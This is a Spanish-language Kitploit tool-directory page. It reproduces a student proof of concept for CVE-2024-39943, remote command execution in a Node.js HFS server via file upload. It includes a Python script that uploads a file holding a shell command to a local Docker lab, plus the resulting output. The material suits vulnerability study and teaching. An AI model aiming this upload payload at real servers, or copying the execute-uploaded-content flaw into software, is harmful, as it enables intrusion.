Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Node.js-CVE-2024-39943 — Exploit de prueba de concepto para CVE-2024-39943, que demuestra la ejecución remota de código a través de la carga de archivos en un servidor HFS de Node.js usando child_process.execSync(). | Kitploit
Herramientas/GitHubGitHub/jenmrr/node.js-cve-2024-39943
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubjenmrr/node.js-cve-2024-39943

Node.js-CVE-2024-39943

Exploit de prueba de concepto para CVE-2024-39943, que demuestra la ejecución remota de código a través de la carga de archivos en un servidor HFS de Node.js usando child_process.execSync().

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 1 añoAún no revisado

Vulnerabilidad de ejecución de comandos en HFS basado en Node.js (CVE-2024-39943)

Escuela White Hat 3ª promoción – 노정민 (@JenmrR)


Resumen

En el entorno del servidor HFS basado en Node.js, existe una vulnerabilidad que ejecuta el contenido de los archivos subidos mediante child_process.execSync().
Un atacante puede ejecutar comandos del sistema operativo directamente a través de la funcionalidad de carga de archivos, pudiendo ver resultados de comandos internos del servidor o controlar el sistema.
Esta vulnerabilidad corresponde a CVE-2024-39943 y representa una amenaza equivalente a la inyección de comandos (Remote Code Execution).


Configuración y ejecución del entorno

  1. Ejecutar el servidor a través del entorno Docker
  2. El servidor recibe la subida de archivos en la ruta /upload, ejecutando el contenido del archivo subido directamente como comando.
  3. El atacante puede lograr RCE mediante la subida.

Flujo de ejecución

root@kitploit:~
$ sudo docker-compose up --build -d
root@kitploit:~
$ python3 poc.py

poc.py

root@kitploit:~
import requests

payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }

r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)

Resultados

Respuesta del servidor después de ejecutar el PoC:

root@kitploit:~
Executed:
Hello_From_Hacked_Server

poc-result


Conclusión

  • Esta vulnerabilidad es un típico RCE (Remote Command Execution) que ocurre cuando se ejecuta entrada externa como un comando del sistema operativo.
  • El método de ejecutar directamente el contenido de los archivos subidos con execSync() conlleva un grave riesgo de seguridad.
  • La entrada del usuario siempre debe validarse y no debe ejecutarse directamente dentro del servidor.
Descargar herramienta